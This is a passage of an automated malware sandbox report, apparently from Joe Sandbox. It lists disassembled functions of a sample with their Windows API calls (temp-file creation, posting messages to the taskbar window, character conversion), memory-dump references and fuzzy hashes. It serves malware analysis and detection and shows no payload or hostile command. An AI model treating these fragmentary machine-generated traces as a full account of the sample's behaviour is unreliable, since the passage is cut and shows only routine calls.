                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A039F0
                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A03A05
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                  • String ID: aut
                                                                                                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                  • Opcode ID: c1e9163e9af344f5b72a5fcfb7817c0ce6672e904ffef54f34b1f8a95eb24931
                                                                                                                                                                                                                                  • Instruction ID: 4c3aeecc1fa1e0618a9b3587bdda41e033fa75494447d6f071df2f63cc8a390e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1e9163e9af344f5b72a5fcfb7817c0ce6672e904ffef54f34b1f8a95eb24931
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAD05B71500314B7DA30D7A89C0DFDB7E6CDB44751F0005A17E5591091DAB0D546C790
                                                                                                                                                                                                                                  Function 00A22DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A22DC8
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A22DDB
                                                                                                                                                                                                                                    • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                  • Opcode ID: 699faac6d2797d026dda0de59feb1e68926704eb992aebac0587eef9e9bd7710
                                                                                                                                                                                                                                  • Instruction ID: 6f2c63b68a57dc272d088012ae90b1427aac91ea294bcdcce82c30e36bfcff03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 699faac6d2797d026dda0de59feb1e68926704eb992aebac0587eef9e9bd7710
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0A935394300B6E234E3B0BC0BFEA2A10AF40B00F100830B309AA0C1C9E46802C640
                                                                                                                                                                                                                                  Function 00A22DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A22E08
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000), ref: 00A22E0F
                                                                                                                                                                                                                                    • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                  • Opcode ID: 8b8a660942a8b14e47538acc627ea556d8c4476c7cef9be0964dc5a3b7bdd67a
                                                                                                                                                                                                                                  • Instruction ID: 282c42fdc33d94394dd6e317dc3742f53ec3c31299bcf1976acc17f3fb198405
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b8a660942a8b14e47538acc627ea556d8c4476c7cef9be0964dc5a3b7bdd67a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D0A9313813007AF234E3B0BC0BFEA2A10AB44B00F100830B305AA0C1C9E46802C644
                                                                                                                                                                                                                                  Function 009CC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009CC213
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009CC221
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009CC27C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b818e9bb745899b6beb1593f2b02be8e0cd1537ebd4a5af7a9f13c3787ffa45f
                                                                                                                                                                                                                                  • Instruction ID: f624dcd189f9efded51510d648426dacca5470e1b120cdca1e0b0dc5bce7a467
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b818e9bb745899b6beb1593f2b02be8e0cd1537ebd4a5af7a9f13c3787ffa45f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B441B4B1E00205ABDB218FE5C844FAA7FA9AF51720F2441ADE86DA71A1DB30DD01C762